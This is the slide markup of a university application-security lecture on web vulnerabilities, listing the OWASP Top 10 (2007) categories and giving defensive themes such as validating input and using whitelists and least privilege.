              <a:t>2/27/2023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1432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DE1D0EA-A6EC-AB7F-15CE-9BEC2D67427A}"/>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E13FC3C9-B375-2E9B-F4F8-4DCA37BCCBFD}"/>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799210DB-8955-2754-2A8D-BBF681564D39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A6CC0068-9018-4FAD-8851-634FA820AAA7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2938672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SmartArt Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dgm" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1981200"/>
            <a:ext cx="10363200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B080015-A3B2-D4E3-FDD8-8D0033DE5698}"/>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F8589AA2-EE25-C9CC-E026-9F6FEABB6C61}"/>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A5C447F9-97FF-05EC-B7A5-D94D9882681E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FC291547-5571-43A1-83A9-7EF4849549EA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261468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67A03-0D75-4281-ABBC-48F8F2265ADC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023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95718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8824-5C6B-BE73-61F9-090CA33E4A28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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4CE1A-B555-C7EF-66BD-54EAAFF50B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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55867E-6824-2C2D-1DF4-85CCF3F4EC08}"/>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0F246D-4AC7-14A8-3CDC-C4EAD6D733B8}"/>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DAC7997-8A42-EC22-110B-764AB1DA3B32}"/>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133CD74-5DA5-7C2F-1642-23CE347DE695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8737600" y="6245225"/>
            <a:ext cx="2844800" cy="476250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E369F551-D486-4C5B-8715-077F0DCA26EE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="711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39F6C-298E-457E-893D-52BE1F95B65D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023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2172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A9AC1-3B9A-40CE-98D7-5F98568B867E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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88212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BF3CD-53C4-4A2E-B87C-39AC67A7CF8F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIS 311: Application Security</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06810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5F49B0-F0A6-4806-8662-5FD789F4D2D3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIS 311: Application Security</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4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30667-29C0-4853-A695-2D323707E37B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIS 311: Application Security</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51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641C9-1611-470E-AFCE-FFA8E3B79975}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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394887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844A5B-7AFE-42E6-B054-6D007AD1C19F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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39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838A6B-9637-4EB2-9216-A4FEE866094A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2/27/2023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lgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIS 311: Application Security</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89478433"/>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lulu.com/items/volume_62/1400000/1400974/1/print/OWASP_Top_10_2007_for_print.doc.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rn.com/security/20740135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owasp.org/index.php/Top_10_200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owasp.org/index.php/Top_10_2007"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buildsecurityin.us-cert.gov/daisy/bsi/articles/best-practices/assembly/639-BSI.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buildsecurityin.us-cert.gov/daisy/bsi/articles/best-practices/assembly/639-BSI.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uci.edu/getdata.jsp?ssn=333224444&amp;ucinetid=johnsmith&amp;password=blah"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E3014-63A5-4454-96EC-66167595DF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="9970" b="15030"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048" y="10"/>
            <a:ext cx="12192001" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6A06DF-F722-4988-BC89-851B8C82FDE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789708" y="4387970"/>
            <a:ext cx="10558405" cy="1378646"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>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Module five: web vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82E07F94-A1B7-4386-B249-3F37A1222475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789708" y="5878187"/>
            <a:ext cx="10558405" cy="501108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>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CIS 311 – Prof. C. R. Johnson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205105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D7E468A1-18B7-13E3-610F-4FE86EC89720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>OWASP’s Top 10 List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571395" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBFF0B8-289A-9B65-DAE6-B521480026C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Injection Flaws </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> SQL Injection, XPATH Injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Malicious File Execution (remote file inclusion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Information leakage and Improper Error Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Broken Authentication and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Insecure Cryptographic Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Insecure Communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Failure to Restrict URL Access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4AB10D55-43DA-B9CB-8B26-146303E0CE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Themes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357379" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9261487-7E81-2F18-4FA1-F06055D726A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>NEVER trust user input!  Always validate!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>This includes headers!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Verify the type and length of parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Syntactic sugar and “clever” programming tricks can lead to security holes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Always, always, always, use whitelists instead of blacklists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use the principle of least privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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58698ED0-618B-4C98-21CD-90433287C3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>This Presentation's  Re-ordered </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Top 10 List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610307" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{324EB776-4920-02C4-BEFB-2AABF13037D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Information leakage and Improper Error Handling </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Failure to Restrict URL Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Injection Flaws </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> SQL Injection, XPATH Injection, etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Malicious File Execution (remote file inclusion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Insecure Communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Broken Authentication and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Insecure Cryptographic Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
